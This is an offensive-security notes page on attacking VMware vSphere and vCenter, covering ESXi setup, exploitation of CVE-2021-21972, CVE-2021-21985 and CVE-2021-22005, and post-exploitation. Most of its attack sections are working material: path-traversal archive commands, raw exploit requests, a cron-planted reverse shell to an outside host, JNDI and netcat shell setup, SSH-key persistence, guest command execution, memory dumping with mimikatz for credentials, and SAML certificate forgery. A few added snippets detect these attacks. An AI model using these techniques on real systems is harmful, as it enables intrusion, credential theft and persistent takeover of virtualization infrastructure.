# VMware vSphere

#### VMware product family <a href="#toc99405081" id="toc99405081"></a>

* Workstation Pro: desktop virtualization on Windows
* Fusion for Mac: desktop virtualization on macOS
* ThinApp: application virtualization
* VMware Enterprise PKS: production-grade Kubernetes for multi-cloud enterprises and service providers
* vSAN: vSphere-native storage virtualization
* vRealize Operations: self-driving IT operations management for private, hybrid and multi-cloud environments
* VMware vSphere: the server virtualization platform
  * VMware uses vSphere as the collective name for this product family

<figure><img src="/files/IyI6nBGAt4cYT5MQfqW6" alt=""><figcaption></figcaption></figure>


vSphere is VMware's virtualization platform suite; it bundles ESXi, vCenter Server and a number of supporting components.

vSphere has two core components:

* ESXi
  * the hypervisor that creates and runs virtual machines and virtual appliances on a physical host
* vCenter Server
  * the management layer that controls many ESXi hosts over the network and pools their resources

The installers can be downloaded from the official site, but that is cumbersome; mirrors:

```bash
# download mirror
http://vmv.re/gets
vmvre

# mirror reachable from China
http://42.81.162.1:443/s/Awsw
```

vCenter Server ships in two forms:

* vCenter Server Appliance (VCSA): a Linux (Photon OS) appliance, the only option from vSphere 7.0 onward
* vCenter Server for Windows (listed here as VMware Integrated Management, VIM): installed on a Windows Server host; deprecated in 6.7 and removed in 7.0

#### ESXi configuration notes <a href="#toc2106402648" id="toc2106402648"></a>

**Password policy**

Passwords must draw on upper-case letters, lower-case letters, digits and special characters and be at least 7 and at most 40 characters long. The rule is enforced by pam_passwdqc; the ESXi default (advanced setting `Security.PasswordQualityControl`) is:

```bash
password   requisite    /lib/security/$ISA/pam_passwdqc.so retry=3 min=disabled,disabled,disabled,7,7
```

Read `min=N0,N1,N2,N3,N4` as the minimum length for passwords using one, two, three or four character classes, then for passphrases: one-, two- and three-class passwords are refused outright, a four-class password needs 7 characters or more. passwdqc does not credit an upper-case letter that starts the password or a digit that ends it, so `Passw0rd!` only counts as three classes.

By default an account is locked after 10 failed login attempts (ESXi 6.5; 5 from 6.7 onward) and unlocked automatically after 15 minutes (`Security.AccountLockFailures`, `Security.AccountUnlockTime` in seconds). The lockout applies to SSH and the SDK/API but not to the DCUI or the ESXi Shell.
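The pam_passwdqc line above is terse, so here is a small model of it. This is an added example, not code from the original notes and not passwdqc's own implementation; it reproduces passwdqc's character-class counting and the `min=disabled,disabled,disabled,7,7` / `max=40` defaults so you can see why a candidate password is accepted or rejected before trying it against a host. The passphrase handling (the fifth value) is simplified to "three or more whitespace-separated words".

```python
"""Model of ESXi's default pam_passwdqc rule min=disabled,disabled,disabled,7,7 (max=40).
Added example, not from the original notes and not passwdqc's own code."""
import string

# min=N0,N1,N2,N3,N4: minimum length for 1-, 2-, 3- and 4-class passwords, then for passphrases
MIN = (None, None, None, 7, 7)   # None stands for "disabled"
MAX_LEN = 40                     # passwdqc default max=40
PASSPHRASE_WORDS = 3             # passwdqc default passphrase=3


def char_classes(pw: str) -> int:
    """Count classes the way passwdqc does: an upper-case letter as the first character
    and a digit as the last character are discounted because they are too predictable."""
    body = pw
    if body[:1].isupper():
        body = body[1:]
    if body[-1:].isdigit():
        body = body[:-1]
    punct = set(string.punctuation)
    return (any(c.isdigit() for c in body)
            + any(c.islower() for c in body)
            + any(c.isupper() for c in body)
            + any(c in punct for c in body))


def check_password(pw: str) -> str:
    """Return 'ok' or the reason the default ESXi policy would reject pw."""
    if len(pw) > MAX_LEN:
        return f"too long: {len(pw)} > {MAX_LEN}"
    # simplified passphrase rule: N4 applies when the password has >= 3 words
    if len(pw.split()) >= PASSPHRASE_WORDS and MIN[4] is not None and len(pw) >= MIN[4]:
        return "ok"
    n = char_classes(pw)
    if n == 0:
        return "no usable characters"
    need = MIN[n - 1]
    if need is None:
        return f"{n}-class passwords are disabled; use all four classes"
    if len(pw) < need:
        return f"too short for a {n}-class password: {len(pw)} < {need}"
    return "ok"
```

`check_password("Passw0rd!")` reports a three-class password even though four kinds of characters appear, which is the usual surprise when setting ESXi passwords from a script.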

By default the ESXi Shell and the SSH service are not running, and only root can log in to the Direct Console User Interface (DCUI).

SSH is therefore not reachable on a fresh ESXi host. To enable it from the host client:

Manage --> Services --> TSM-SSH --> Start

In the host client you can also see whether this host is already managed by a vCenter Server.

<figure><img src="/files/qaG23DKzQ96Wus1LwwRU" alt=""><figcaption></figcaption></figure>


Useful commands:

```bash
esxcfg-vmknic -l                              # list VMkernel NICs, i.e. the host's management IP addresses
vim-cmd vmsvc/getallvms                       # list all registered VMs (Vmid, name, datastore path, guest OS)
esxcli network firewall get                   # firewall status (enabled, default action)
esxcli network firewall ruleset list          # list rulesets and whether each is enabled
esxcli network firewall set --enabled false   # disable the host firewall (true re-enables it)
```

[https://blog.51cto.com/u\_4674157/](https://blog.51cto.com/u_4674157/3777054)

**Resetting the SSO administrator password**

Scenario: you have a webshell on the vCenter host, want to log in to vCenter, and cannot recover the administrator password. `vdcadmintool`, run as root (or SYSTEM) on the vCenter itself, can force-reset the password of `administrator@vsphere.local`: pick the "Reset account password" menu item and enter the account UPN.

```bash
# Linux (VCSA): force-reset the SSO administrator password
/usr/lib/vmware-vmdir/bin/vdcadmintool

# Windows vCenter: same tool
"C:\Program Files\VMware\vCenter Server\vmdird\vdcadmintool.exe"
```

A reset is noisy: the old password stops working and operators notice. The SAML certificate technique further down yields an administrator session without touching the password.

**Uploading an SSH key over HTTPS PUT**

The ESXi Shell and SSH are off by default and only root can use the DCUI. Once SSH is running, root can authenticate with the host password or with an SSH key; the key file can be written remotely with an HTTPS PUT to the host's `/host/` file interface, which gives key-based SSH access that survives reboots and later password changes.

Key file locations:

root's authorized keys file

```bash
https://hostname_or_IP_address/host/ssh_root_authorized_keys
```

You need full administrator privileges on the host to upload this file. The same interface also serves the host's SSH host keys, private ones included, so reads of these paths are worth alerting on:

```bash
DSA host private key   https://hostname_or_IP_address/host/ssh_host_dsa_key
DSA host public key    https://hostname_or_IP_address/host/ssh_host_dsa_key_pub
RSA host private key   https://hostname_or_IP_address/host/ssh_host_rsa_key
RSA host public key    https://hostname_or_IP_address/host/ssh_host_rsa_key_pub
```

The 401 challenge is HTTP Basic authentication against a local ESXi account (root), not a vCenter SSO login.

{% code overflow="wrap" %}

```bash
https://192.168.238.137/host/

# generate a key pair with an empty passphrase
ssh-keygen -t rsa -P "" -f ~/.ssh/id_rsa

# PUT the public key (id_rsa.pub) as the body; the Basic value is base64("root:<root password>")
PUT /host/ssh_root_authorized_keys HTTP/1.1
Host: 192.168.238.138
Authorization: Basic cm9vdDoxMjNxd2UhQCMuLi4=
Content-Length: 407

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZ4gGhuM9GFeh7Kivi0BmxjLy4Brq9V3AEzPlXoXnHWumFC/FJWmZrHVGgDzBL26o/qsPyHnMffJve6egqyaV05+ULiPOzpjoLmG3+7uhhEKfY7KZ/uDMkmeufhvwTBfIIndARqzuAbsx6ekJb794fBhpOG7hPNcziqs5jRRQf9lLUQgltBfReFf6Tj9j2Ff471HlGaVdwKyGp4T3oKpH4K7kgdarMoh1KT2bC9ijHD1TpdQLfNjKJ+uXccaWWG7eEQCYmwQtbL80PVVTq5HTkZaqw+BhSRF8ur0NWX9WC3G4r4vYEc46meh1pwowHn69ZWRuvql1I4IfjytL4totH root@localhost.localdomain
```

{% endcode %}
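The raw request above, scripted. This is an added example, not code from the original notes; it assumes the target accepts HTTP Basic authentication for a local ESXi account and presents the usual self-signed certificate (verification is disabled). Note that a PUT replaces the whole file, so if the host already has authorized keys you must GET the current content and merge it into the body first; the same path answers GET, which the script uses to confirm the key landed.

```python
"""Write root's authorized_keys on ESXi through the /host/ file interface (HTTPS PUT)
and read it back to confirm. Added example, not from the original notes."""
import base64
import ssl
import sys
import urllib.request
from pathlib import Path

AUTHORIZED_KEYS_PATH = "/host/ssh_root_authorized_keys"


def basic_auth_header(user: str, password: str) -> str:
    """Value of the Authorization header: 'Basic ' + base64('user:password')."""
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


def build_put(host: str, user: str, password: str, pubkey: str):
    """Return (url, headers, body) for the PUT. The body becomes the whole file,
    so merge any existing keys into pubkey first if they must be kept."""
    body = pubkey.strip().encode() + b"\n"
    headers = {
        "Authorization": basic_auth_header(user, password),
        "Content-Type": "text/plain",
        "Content-Length": str(len(body)),
    }
    return f"https://{host}{AUTHORIZED_KEYS_PATH}", headers, body


def key_present(authorized_keys: str, pubkey: str) -> bool:
    """True if pubkey's type and base64 blob (comment ignored) appear in the file."""
    want = pubkey.split()[:2]
    return any(line.split()[:2] == want for line in authorized_keys.splitlines())


def upload_key(host: str, user: str, password: str, pubkey_file: str = "~/.ssh/id_rsa.pub"):
    """PUT the key, then GET the same path (it serves the file) and verify. Returns (status, ok)."""
    pubkey = Path(pubkey_file).expanduser().read_text()
    url, headers, body = build_put(host, user, password, pubkey)
    ctx = ssl._create_unverified_context()  # ESXi normally has a self-signed certificate
    put = urllib.request.Request(url, data=body, headers=headers, method="PUT")
    with urllib.request.urlopen(put, context=ctx) as resp:
        status = resp.status
    get = urllib.request.Request(url, headers={"Authorization": headers["Authorization"]})
    with urllib.request.urlopen(get, context=ctx) as resp:
        installed = resp.read().decode()
    return status, key_present(installed, pubkey)


if __name__ == "__main__":
    # usage: python3 put_key.py 192.168.238.138 root '123qwe!@#...'
    print(upload_key(*sys.argv[1:4]))
```

`basic_auth_header("root", "123qwe!@#...")` produces exactly the `Basic cm9vdDoxMjNxd2UhQCMuLi4=` value shown in the captured request, which is a quick way to confirm what credential a captured header contains.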


#### Exploitation <a href="#toc1041384141" id="toc1041384141"></a>

* vCenter (and ESXi) version information: `/sdk/vimServiceVersions.xml`, served without authentication; it lists the supported API namespace versions
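Fingerprinting from `vimServiceVersions.xml`, as an added example that is not part of the original notes. The XML sample is constructed to mirror the real layout (a `namespaces` root with one `namespace` element per API namespace). The API version only identifies the update release (for instance `7.0.1.0` is 7.0 U1), not the patch level within it, so the triage result is a hint to confirm against the build number, which `RetrieveServiceContent` on `/sdk` returns in `about.build` without credentials.

```python
"""Fingerprint the vSphere API version from /sdk/vimServiceVersions.xml.
Added example, not from the original notes; SAMPLE_XML is constructed."""
import ssl
import urllib.request
import xml.etree.ElementTree as ET

# constructed sample of what a vCenter 7.0 U1 answers (API version 7.0.1.0)
SAMPLE_XML = """<?xml version="1.0" encoding="UTF-8" ?>
<namespaces version="1.0">
  <namespace>
    <name>urn:vim25</name>
    <version>7.0.1.0</version>
    <priorVersions>
      <version>7.0.0.0</version>
      <version>6.7.3</version>
      <version>6.7.2</version>
      <version>6.5</version>
    </priorVersions>
  </namespace>
</namespaces>"""

# vCenter families and the release that fixes CVE-2021-21972 (from the advisory summary);
# the API version names the update release but not the patch level inside it
PATCHED_MIN = {"7.0": "7.0 U1c", "6.7": "6.7 U3l", "6.5": "6.5 U3n"}


def parse_vim_version(xml_text) -> str:
    """Return the current urn:vim25 API version string, e.g. '7.0.1.0'."""
    data = xml_text.encode() if isinstance(xml_text, str) else xml_text
    root = ET.fromstring(data)
    for ns in root.findall("namespace"):
        if ns.findtext("name") == "urn:vim25":
            return ns.findtext("version")
    raise ValueError("urn:vim25 namespace not found")


def family(api_version: str) -> str:
    """'7.0.1.0' -> '7.0', '6.7.3' -> '6.7'."""
    major, minor = api_version.split(".")[:2]
    return f"{major}.{minor}"


def triage(api_version: str) -> str:
    fam = family(api_version)
    if fam in PATCHED_MIN:
        return f"{fam} family: CVE-2021-21972 fixed in {PATCHED_MIN[fam]}; confirm the build number"
    return f"{fam} family: outside the advisory's affected families"


def fetch_vim_version(host: str) -> str:
    """Live check against a host (self-signed certificate tolerated)."""
    ctx = ssl._create_unverified_context()
    with urllib.request.urlopen(f"https://{host}/sdk/vimServiceVersions.xml", context=ctx) as r:
        return parse_vim_version(r.read())


if __name__ == "__main__":
    import sys
    print(triage(fetch_vim_version(sys.argv[1])))
```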

**CVE-2021-21972**

Affected versions (VMSA-2021-0002; unauthenticated file upload in the vSphere Client's vROps plugin, leading to RCE)

* VMware vCenter Server 7.0 series < 7.0 U1c
* VMware vCenter Server 6.7 series < 6.7 U3l
* VMware vCenter Server 6.5 series < 6.5 U3n
* VMware ESXi 7.0 series < ESXi70U1c-17325551
* VMware ESXi 6.7 series < ESXi670-202102401-SG
* VMware ESXi 6.5 series < ESXi650-202102101-SG

The ESXi builds come from the same advisory but fix CVE-2021-21974 (OpenSLP heap overflow); CVE-2021-21972 itself only affects vCenter Server.

**Exploitation on Windows**

Path of the target webapp on a Windows vCenter:

{% code overflow="wrap" %}

```bash
ProgramData\VMware\vCenterServer\data\perfcharts\tc-instance\webapps\statsreport
# build a tar whose member names traverse (../) out of the upload directory into the statsreport webapp
https://github.com/ptoomey3/evilarc/blob/master/evilarc.py
python evilarc.py -d 2 -p 'ProgramData\VMware\vCenterServer\data\perfcharts\tc-instance\webapps\statsreport' -o win -f winexpl.tar winshe.jsp
```

{% endcode %}

Upload the archive through the vROps plugin's OVA endpoint. The endpoint performs no authentication check (that is the vulnerability), so the session cookies below are not required; after extraction the JSP is served by the statsreport webapp at https://<vcenter>/statsreport/winshe.jsp.

```bash
POST /ui/vropspluginui/rest/services/uploadova HTTP/1.1
Host: 192.168.238.132
Cookie: VSPHERE-USERNAME=Administrator%40VSPHERE.LOCAL; VSPHERE-CLIENT-SESSION-INDEX=_f97bb91caea8a2af952cd91ec5d47eb8; VSPHERE-UI-JSESSIONID=0C5DAAED678BDADE5DE0A9599359A141; VSPHERE-UI-XSRF-TOKEN=059001d4-15b3-4ab5-b83f-604c37fb2471; style=light
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1YoXljo9
Content-Length: 10389

------WebKitFormBoundary1YoXljo9
Content-Disposition: form-data; name="uploadFile"; filename="winexpl.tar"

<binary contents of winexpl.tar>
------WebKitFormBoundary1YoXljo9--
```

**Exploitation on Linux**

[If this does not work, create a local `vsphere-ui` user on your own machine first and generate the key pair as that user.]

{% code overflow="wrap" %}

```bash
# drop an authorized_keys file into the vsphere-ui service account's home
python evilarc.py -d 2 -p 'home/vsphere-ui/.ssh' -o unix -f unixshe.tar authorized_keys
ssh vsphere-ui@<vCenter IP>

# alternative target for a JSP shell; the vsphere-ui service needs a restart before it is served
/usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/
# the dropped Linux shell is then reachable at: https://<photon-machine>/ui/resources/winshe.jsp

# if that fails either, try these (the script has bugs and needs rewriting):
https://github.com/NS-Sp4ce/CVE-2021-21972/blob/7048b1d0a71a862284c2d54f78aba913ccef5776/CVE-2021-21972.py
https://0x20h.com/p/7cb6
```

{% endcode %}
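Both the Windows and the Linux variants above rest on the same defect: the plugin extracted a tar archive without checking where each member name resolves. The following added example (not from the original notes, and not evilarc's or VMware's code) shows the check that was missing, a hardened extractor that refuses the whole archive instead of writing what it can, and a constructed in-memory archive with one benign member and one evilarc-shaped traversal member. The default destination `/tmp/unicorn_ova_dir` is the extraction directory reported in public analyses of the bug and is only an assumption here.

```python
"""Detect tar members that escape the extraction directory (the root cause of the
CVE-2021-21972 uploadova traversal) and a hardened extractor. Added example, not from the
original notes; SAMPLE is constructed in memory."""
import io
import posixpath
import tarfile


def escapes(dest: str, member_name: str) -> bool:
    """True if dest/member_name resolves outside dest. Handles '..', absolute paths and
    backslashes (an extractor on Windows treats '\\' as a separator too)."""
    dest = posixpath.normpath(dest)
    name = member_name.replace("\\", "/")
    if posixpath.isabs(name):
        return True
    resolved = posixpath.normpath(posixpath.join(dest, name))
    return not (resolved == dest or resolved.startswith(dest + "/"))


def unsafe_members(tar_bytes: bytes, dest: str = "/tmp/unicorn_ova_dir") -> list:
    """Member names that would land outside dest; links are flagged as well because a
    link inside dest can still point outside it."""
    bad = []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:*") as tf:
        for m in tf.getmembers():
            if escapes(dest, m.name) or m.issym() or m.islnk():
                bad.append(m.name)
    return bad


def safe_extract(tar_bytes: bytes, dest: str) -> None:
    """Hardened counterpart of the vulnerable extractor: reject the whole archive
    up front rather than extracting member by member."""
    bad = unsafe_members(tar_bytes, dest)
    if bad:
        raise ValueError(f"path traversal in archive: {bad}")
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:*") as tf:
        tf.extractall(dest)


def build_tar(entries: dict) -> bytes:
    """Build a plain tar from {member_name: content_bytes} (used for the constructed sample)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        for name, data in entries.items():
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tf.addfile(info, io.BytesIO(data))
    return buf.getvalue()


# constructed sample: one benign member and one traversal member of the evilarc shape
SAMPLE = build_tar({
    "image.ovf": b"<Envelope/>",
    "../../home/vsphere-ui/.ssh/authorized_keys": b"ssh-rsa AAAA... attacker\n",
})
```

`unsafe_members` is also usable on its own as a scanner for archives captured from an upload endpoint: any non-empty result is an exploitation attempt.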


**CVE-2021-21985**

Affected (VMSA-2021-0010; RCE through the vSAN Health Check plugin in the vSphere Client):

* vCenter Server 6.5
* vCenter Server 6.7
* vCenter Server 7.0
* Cloud Foundation (vCenter Server) 3.x
* Cloud Foundation (vCenter Server) 4.x

Linux (VCSA) targets only.

```bash
# start the JNDI/RMI server that serves the payload class (listens on 1099, points the payload at the listener)
java -jar JNDIInjection-Bypass.jar 1099 192.168.238.1 8841

# reverse-shell listener
nc -lvp 8841

# fire the exploit: target vCenter, then the JNDI reference the plugin is made to look up
python3 CVE-2021-21985_exp.py https://192.168.238.149 rmi://192.168.238.146:1099/Exploit
```

<https://github.com/r0ckysec/CVE-2021-21985>

**CVE-2021-22005**

Affected versions (VMSA-2021-0020; arbitrary file write through the Analytics service's telemetry endpoint, no authentication required):

7.0, 6.7, 6.5, Cloud Foundation 4.x and 3.x

<https://github.com/r0ckysec/CVE-2021-22005> (EXP)

The endpoint writes the POST body to a file whose path is built from the `_i` query parameter without sanitisation. First a harmless probe:

```bash
POST /analytics/telemetry/ph/api/hyper/send?_c=e&_i=/ce21 HTTP/1.1
Host: 192.168.23.119
Content-Length: 13

{"aaa":"bbb"}
```

Then a traversal that drops a cron job, which runs as root within a minute and connects back. If the job never fires, check that the written file ends in a newline, which cron requires:

{% code overflow="wrap" %}

```bash
POST /analytics/telemetry/ph/api/hyper/send?_c=e&_i=/../../../../../../../../../../../../etc/cron.d/cs21 HTTP/1.1
Host: 192.168.23.119
Content-Length: 60

*/1 * * * * root bash -i >& /dev/tcp/192.168.23.77/8091 0>&1
```

{% endcode %}
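The two requests above leave a distinctive trace in any HTTP access log in front of vCenter. This added example (not from the original notes) runs a detection over constructed Apache/nginx-style log lines: a request to the telemetry path whose `_i` value contains a `..` segment is a traversal attempt, and one whose `_i` starts with `/` matches the probe shape. The value is URL-decoded a second time on purpose so a double-encoded `%252e%252e` is still caught.

```python
"""Detect CVE-2021-22005 exploitation attempts (traversal in the _i parameter of the
analytics telemetry endpoint) in HTTP access logs. Added example, not from the original
notes; SAMPLE_LOG is constructed."""
import re
from typing import Optional
from urllib.parse import parse_qs, unquote, urlsplit

TELEMETRY_PATH = "/analytics/telemetry/ph/api/hyper/send"
LINE_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                     r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# constructed sample: probe, cron.d write, URL-encoded variant, legitimate telemetry, unrelated
SAMPLE_LOG = """\
10.0.0.5 - - [21/Sep/2021:10:00:01 +0000] "POST /analytics/telemetry/ph/api/hyper/send?_c=e&_i=/ce21 HTTP/1.1" 201 0
10.0.0.5 - - [21/Sep/2021:10:00:02 +0000] "POST /analytics/telemetry/ph/api/hyper/send?_c=e&_i=/../../../../../../../../../../../../etc/cron.d/cs21 HTTP/1.1" 201 0
10.0.0.7 - - [21/Sep/2021:10:00:03 +0000] "POST /analytics/telemetry/ph/api/hyper/send?_c=e&_i=%2F..%2F..%2Fetc%2Fcron.d%2Fx HTTP/1.1" 201 0
10.0.0.9 - - [21/Sep/2021:10:00:04 +0000] "POST /analytics/telemetry/ph/api/hyper/send?_c=vcenter&_i=1a2b3c HTTP/1.1" 201 0
10.0.0.9 - - [21/Sep/2021:10:00:05 +0000] "GET /ui/ HTTP/1.1" 200 1234
"""


def instance_param(target: str) -> str:
    """The _i value, decoded twice to defeat double encoding."""
    raw = parse_qs(urlsplit(target).query).get("_i", [""])[0]
    return unquote(raw)


def classify_target(target: str) -> Optional[str]:
    """None when the request is not telemetry abuse; otherwise a label."""
    if urlsplit(target).path != TELEMETRY_PATH:
        return None
    instance = instance_param(target).replace("\\", "/")
    if ".." in instance.split("/"):
        return "traversal"        # _i walks out of the analytics log directory
    if instance.startswith("/"):
        return "absolute-path"    # the probe shape (_i=/ce21)
    return None


def scan(log_text: str) -> list:
    """Return (source, label, _i) for every suspicious POST in the log."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        label = classify_target(m["target"])
        if label:
            hits.append((m["src"], label, instance_param(m["target"])))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A `traversal` hit whose `_i` ends under `/etc/cron.d/` should be treated as a confirmed root-level compromise of the appliance, not just an attempt.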

**vCenter < 6.0: Struts S2-045**

```bash
# old releases ship a Struts 2 vulnerable to S2-045 (CVE-2017-5638) under the statsreport webapp
https://vmware/statsreport/vmHome.do
```

#### Post-exploitation <a href="#toc551534737" id="toc551534737"></a>

Everything below assumes you already hold valid vCenter or ESXi credentials (or a session).

With the password you can:

* read a VM's configuration
* browse the VM's files on the datastore
* delete VM files
* upload files into a VM (guest)
* download files from a VM
* execute commands inside a VM

Uploading, downloading and executing inside the guest go through the guest operations API: they need VMware Tools running in the guest plus a guest account, but no network path to the VM.

The legacy REST API (before vSphere 7.0 U2) does not support the following; the tools below use the SOAP API (`/sdk`) for them:

* browse VM files
* delete VM files
* upload files into a VM
* download files from a VM
* execute commands in a VM

**SharpSphere**

{% code overflow="wrap" %}

```bash
# if the project does not build: Tools --> NuGet Package Manager --> Package Sources --> add https://api.nuget.org/v3/index.json

# enumerate VMs
SharpSphere.exe list --url https://192.168.238.138/sdk/ --username root --password 123qwe!@#
[x] Disabling SSL checks in case vCenter is using untrusted/self-signed certificates
[x] Creating vSphere API interface
[x] Connected to VMware ESXi 6.7.0 build-15160138
[x] Authenticating with provided username and password
[x] Successfully authenticated
Name: Centos7 | Power: poweredOn | OS: CentOS 7 (64-bit) | Tools: guestToolsUnmanaged | IP: 192.168.238.139

# execute a command in the guest (needs VMware Tools and a guest account)
.\SharpSphere.exe execute --url https://192.168.238.138/sdk --username root --password 123qwe!@# --ip 192.168.238.141 --guestusername administrator --guestpassword 123qwe!@# --command whoami --output

# upload a file into the guest
.\SharpSphere.exe upload --url https://192.168.238.138/sdk --username root --password 123qwe!@# --ip 192.168.238.141 --guestusername administrator --guestpassword 123qwe!@# --source D:\calc.exe --destination C:\Users\Public\payload.exe

# download a file from the guest
Z:\>SharpSphere.exe download --url https://URL/sdk --username administrator@vsphere.local --password <PASSWORD> --ip <IP> --guestusername James --guestpassword <PASSWORD> --source C:\Users\Public\payload.exe --destination Z:\result.exe
```

{% endcode %}

**Dumping VM memory to recover credentials**

{% code overflow="wrap" %}

```bash
# dump: snapshot the VM and download its memory; currently fails against a bare ESXi host (the download step) but works through vCenter
.\SharpSphere.exe dump --url https://192.168.238.138/sdk/ --username root --password 123qwe!@# --targetvm "Win2008" --destination "C:\Users\Public\" --snapshot

# the downloaded snapshot consists of a .vmsn and a .vmem file; convert them into a Windows crash dump with vmss2core
.\vmss2core-sb-8456865.exe -W .\Win2008-Snapshot5.vmsn .\Win2008-Snapshot5.vmem

# for Windows 8/8.1, Server 2012, Server 2016 or Server 2019 guests use -W8:
vmss2core.exe -W8 virtual_machine_name.vmsn virtual_machine_name.vmem

# load the resulting memory.dmp in WinDbg Preview
https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/windbg-install-preview

# load mimilib inside the debugger
kd> .load C:\Users\A\Desktop\vmnx\mimikatz_trunk\x64\mimilib.dll

# find the lsass process
kd> !process 0 0 lsass.exe

# switch into that process context (EPROCESS address from the previous output)
kd> .process /r /p fffffa80028f2400

# dump credentials from memory
kd> !mimikatz
```

{% endcode %}

![](/files/z64TKR1Zfoow2RO2gDa)

**Extension: qcow2 disks (KVM/libvirt)**

```bash
# open the virtual disk read-only
guestfish --ro -a /var/lib/libvirt/images/centos7.qcow2
><fs> run                        # launch the appliance and scan the disk
><fs> list-filesystems           # list the filesystems found
><fs> mount /dev/centos/root /   # mount the root logical volume
><fs> cat /etc/shadow

# -i inspects the guest OS and mounts its filesystems automatically
guestfish --ro -a /var/lib/libvirt/images/centos7.qcow2 -i
```

**PySharpSphere**

<https://github.com/RicterZ/PySHarpSphere>

This tool is implemented on top of pyVmomi (the Python bindings for the vSphere SOAP API).

{% code overflow="wrap" %}

```bash
# list VMs (quote the password: it contains shell metacharacters)
pysharpsphere.exe -H 192.168.238.132 -u administrator@vsphere.local -p '#jLuNK5[z(,0p6K9Xj7C' list

# execute a command in the guest
pysharpsphere.exe -H 192.168.100.49 -u administrator@vsphere.local -p password execute -t vm-1020 --guest-user administrator --guest-pass guestpassword -c whoami

# upload a file
pysharpsphere.exe -H 192.168.100.49 -u administrator@vsphere.local -p password upload -t vm-1020 --guest-user administrator --guest-pass guestpassword --source /tmp/test.exe --dest C:\\c2.exe

# dump a memory snapshot of the VM
pysharpsphere.exe -H 192.168.100.49 -u administrator@vsphere.local -p password dump -t vm-1020

# execute a command authenticating to the guest with an NTLM hash
pysharpsphere.exe -H 192.168.100.49 -u administrator@vsphere.local -p password execute -t vm-1015 --guest-user administrator --guest-ntlm ea41383fa39c20f186cbcdc0ac234417 -c whoami
```

{% endcode %}

Anyone who can log in to the vCenter UI can do the same by hand, without tooling:

create a snapshot of the VM --> open the datastore browser --> download the snapshot files (.vmsn and .vmem)

![](/files/IymW7TeIouIOnkgQU5mT)

**PowerCLI**

Official documentation: <https://developer.vmware.com/docs/powercli/latest/vmware.vimautomation.core/commands/get-vm/#Default>

{% code overflow="wrap" %}

```powershell
# offline install: download the PowerCLI zip from
# https://code.vmware.com/doc/preview?id=13693

# find the module path and unzip PowerCLI into one of its directories
$env:PSModulePath

# confirm the module is visible
Get-Module -Name VMware.PowerCLI -ListAvailable

# allow locally created scripts to run
Set-ExecutionPolicy RemoteSigned

# ignore certificate errors (vCenter usually has a self-signed certificate) and opt out of CEIP
Set-PowerCLIConfiguration -Scope AllUsers -ParticipateInCeip $false -InvalidCertificateAction Ignore

# connect to the server
Connect-VIServer -Server 192.168.238.149 -Protocol https -User Administrator@GIAO.LOCAL -Password 'Qazxx!@#...' -Force

# disconnect
Disconnect-VIServer -Server 192.168.238.149 -Force -Confirm:$false

# upload a file into the guest
Copy-VMGuestFile -Source c:\text.txt -Destination c:\temp\ -VM VM -LocalToGuest -GuestUser user -GuestPassword pass2

# download a file from the guest
Copy-VMGuestFile -Source c:\text.txt -Destination c:\temp\ -VM VM -GuestToLocal -GuestUser user -GuestPassword pass2

# get the VM name with Get-VM first, then run a command in the guest
Invoke-VMScript -VM "Centos7 (1)" -ScriptText "cat /etc/passwd" -GuestUser root -GuestPassword "123qwe!@#"
```

{% endcode %}

![](/files/HlmzNc8di1hhBZadkFu6)

Running commands in a Windows guest requires VMware Tools to be installed and running in the guest.

{% code overflow="wrap" %}

```bash
Invoke-VMScript -VM "Win2012" -ScriptText "whoami" -GuestUser administrator -GuestPassword "123qwe!@#"
```

{% endcode %}

<figure><img src="/files/3oRNr3yzpBtVR7rwJz9s" alt=""><figcaption></figcaption></figure>

The traffic is encrypted: the API calls travel over HTTPS to `/sdk`, and the guest operations are delivered to the guest through VMware Tools rather than over the guest's own network, so a sensor on the VM's network segment never sees the commands.

<figure><img src="/files/s8pyKhKKoQ4P4WOAaJ3j" alt=""><figcaption></figcaption></figure>

**vCenter SAML certificates**

For when you have a webshell on the vCenter and do not want to reset the administrator password.

<https://github.com/horizon3ai/vcenter_saml_login>

The tool reads the SSO identity provider certificate and its private key out of the vmdir database (data.mdb), signs a SAML assertion for the Administrator account with that key and exchanges the assertion for a vSphere Client session cookie:

```bash
# Linux (VCSA):
/storage/db/vmware-vmdir/data.mdb
# Windows:
C:\ProgramData\VMware\vCenterServer\data\vmdird\data.mdb

python3 vcenter_saml_login.py -p data.mdb -t 10.0.100.200
[*] Successfully extracted the IdP certificate
[*] Successfully extracted trusted certificate 1
[*] Successfully extracted trusted certificate 2
[*] Obtaining hostname from vCenter SSL certificate
[*] Found hostname vcsa.olympus for 10.0.100.200
[*] Initiating SAML request with 10.0.100.200
[*] Generating SAML assertion
[*] Signing the SAML assertion
[*] Attempting to log into vCenter with the signed SAML request
[+] Successfuly obtained Administrator cookie for 10.0.100.200!
[+] Cookie: VSPHERE-UI-JSESSIONID=06D1630719B4DE33A4CE653458911640
```

Open https://<VCSA>/ui, add the cookie for the /ui path in the browser and reload: you are logged in as Administrator. Because the assertion carries the IdP's genuine signature, the client cannot distinguish it from a normal SSO login. Treat data.mdb as a credential store: a copy of it is equivalent to the SSO signing key, and once it has leaked the remediation is to rotate the STS signing certificate.

**Decrypting vpxuser passwords**

<https://github.com/shmilylty/vhost_password_decrypt>

For every managed ESXi host, vCenter keeps the password of the `vpxuser` account it created there (an account with the Administrator role on the host) in the VCDB `vpx_host` table, encrypted with the symmetric key in `symkey.dat`. With root on the vCenter you can pull both and decrypt, which yields administrator access to every ESXi host in the inventory.

{% code overflow="wrap" %}

```bash
# database credentials for the vc user
cat /etc/vmware-vpx/vcdb.properties

# export the encrypted passwords on their own
